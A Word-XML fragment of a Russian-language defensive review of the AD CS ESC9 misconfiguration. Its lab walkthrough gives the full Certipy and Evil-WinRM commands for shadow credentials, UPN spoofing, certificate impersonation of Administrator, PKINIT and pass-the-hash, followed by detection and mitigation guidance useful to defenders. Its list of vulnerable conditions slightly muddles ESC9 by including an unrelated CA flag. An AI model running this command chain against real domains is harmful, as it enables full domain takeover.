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Уязвимость AD CS ESC9 (отсутствие расширения безопасности):</w:t>
        <w:br/>
        <w:t>механизм эскалации привилегий и меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Аналитический обзор эксплуатации шаблонов сертификатов в Active Directory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анализируется ESC9 — некорректная настройка служб сертификатов Active Directory (AD CS), при которой флаг CT_FLAG_NO_SECURITY_EXTENSION отключает расширение безопасности szOID_NTDS_CA_SECURITY_EXT. Показано, что даже при включённом строгом связывании сертификатов (StrongCertificateBindingEnforcement) это позволяет эксплуатировать неявное сопоставление по полю UPN и выдавать себя за привилегированную учётную запись. Систематизированы шаги эксплуатации с помощью Certipy; основное внимание уделено мерам обнаружения и противодействия.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информационная безопасность; Active Directory; AD CS; ESC9; szOID_NTDS_CA_SECURITY_EXT; UPN-спуфинг; shadow credentials; эскалация привилегий.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ESC9 — критическая некорректная настройка служб сертификатов AD CS, позволяющая эскалацию привилегий через злоупотребление шаблоном сертификата. Уязвимость возникает, когда на шаблоне установлен флаг CT_FLAG_NO_SECURITY_EXTENSION, отключающий расширение szOID_NTDS_CA_SECURITY_EXT. В этом случае обходится принудительное строгое сопоставление сертификатов, а неявное сопоставление (по полям SAN/UPN) становится уязвимым к подмене. В результате низкопривилегированный пользователь может запросить сертификат для любой учётной записи (например, администратора домена), а затем через PKINIT получить билет Kerberos (TGT), что ведёт к полной компрометации домена. Цель работы — проанализировать цепочку с позиции защитника и систематизировать меры обнаружения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Испытательный стенд и исходные условия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Инфраструктура: Windows Server 2019 с Active Directory и настроенной AD CS/ЦС; домен ignite.local; сервер DC/CA ignite-DC1 (192.168.1.16); атакующий узел Kali Linux с Certipy и Evil-WinRM. Учётные записи: атакующий raj (рядовой доменный пользователь), прокси-аккаунт sanjeet (доступен на запись), цель — Administrator. Уязвимый шаблон ESC9 имеет флаг NoSecurityExtension и разрешает запись доменным пользователям. В командах хеш заменён плейсхолдером &lt;ntlm-hash&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Шаги эксплуатации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.1. Перечисление уязвимых шаблонов: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certipy-ad find -u 'raj@ignite.local' -p &lt;password&gt; -dc-ip 192.168.1.16 -vulnerable -enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.2. Внедрение shadow credentials в прокси-аккаунт (возвращает NTLM-хеш для аутентификации):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certipy-ad shadow auto -u raj@ignite.local -p &lt;password&gt; -account sanjeet -dc-ip 192.168.1.16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.3. Подмена UPN прокси-аккаунта на целевой (ключевой шаг, обеспечивающий олицетворение):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certipy-ad account update -u raj@ignite.local -p &lt;password&gt; -user sanjeet -upn Administrator -dc-ip 192.168.1.16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.4. Запрос сертификата от уязвимого шаблона — ЦС выдаёт сертификат с идентичностью Administrator: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certipy-ad req -u sanjeet@ignite.local -hashes &lt;ntlm-hash&gt; -ca ignite-DC1-CA -template ESC9 -dc-ip 192.168.1.16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.5. Возврат исходного UPN (снижение заметности); сертификат остаётся действительным для Administrator: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certipy-ad account update -u raj@ignite.local -p &lt;password&gt; -user sanjeet -upn sanjeet@ignite.local -dc-ip 192.168.1.16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.6. Аутентификация по сертификату через PKINIT — DC выдаёт TGT и NTLM-хеш администратора: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certipy-ad auth -pfx administrator.pfx -domain ignite.local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certipy-ad auth -pfx administrator.pfx -domain ignite.local -ldap-shell -dc-ip 192.168.1.16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.7. Удалённый доступ к DC по полученному хешу (передача хеша):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evil-winrm -i 192.168.1.16 -u administrator -H &lt;ntlm-hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Условия уязвимости шаблона</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Уязвимая конфигурация стенда: шаблон ESC9 как копия шаблона User с установленным флагом NoSecurityExtension; разрешение на запись у прокси-аккаунта; на стороне ЦС включён параметр EDITF_ATTRIBUTESUBJECTALTNAME2 (0x10000000), допускающий задание SAN в запросе. Совокупность этих условий и отсутствие расширения безопасности позволяют сопоставить выданный сертификат с привилегированной учётной записью по полю UPN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Обнаружение и меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Приоритетные меры: установить StrongCertificateBindingEnforcement = 2 на контроллерах домена; удалить флаг CT_FLAG_NO_SECURITY_EXTENSION со всех активных шаблонов; отключить на ЦС небезопасный параметр EDITF_ATTRIBUTESUBJECTALTNAME2; ограничить права на запись (enroll) и исключить их выдачу группе «Domain Users». Обнаружение: мониторинг событий выдачи сертификатов (4886/4887), оповещения об изменении атрибута userPrincipalName и о добавлении shadow credentials (изменения msDS-KeyCredentialLink), а также регулярный аудит шаблонов и прав инструментами анализа AD CS. Дополнительно — многоуровневое администрирование и защита привилегированных учётных записей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ESC9 показывает, как отключение единственного расширения безопасности превращает слабое сопоставление сертификатов в путь полного захвата домена. Сочетание подмены UPN, shadow credentials и аутентификации по сертификату позволяет низкопривилегированному пользователю стать администратором домена, не обладая легитимными учётными данными. Устойчивая защита достигается принудительным строгим связыванием сертификатов, удалением опасного флага и параметра ЦС, ограничением прав enroll и мониторингом выдачи сертификатов и изменений атрибутов учётных записей.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ly4k. Certipy: Active Directory Certificate Services enumeration and abuse. GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. SpecterOps. Certified Pre-Owned: abusing Active Directory Certificate Services (whitepaper, ESC1–ESC8).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. ly4k. Certipy 4.0: ESC9 and ESC10 (certificate mapping) research.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Microsoft. KB5014754: certificate-based authentication changes and StrongCertificateBindingEnforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. MITRE ATT&amp;CK. Steal or Forge Authentication Certificates (T1649).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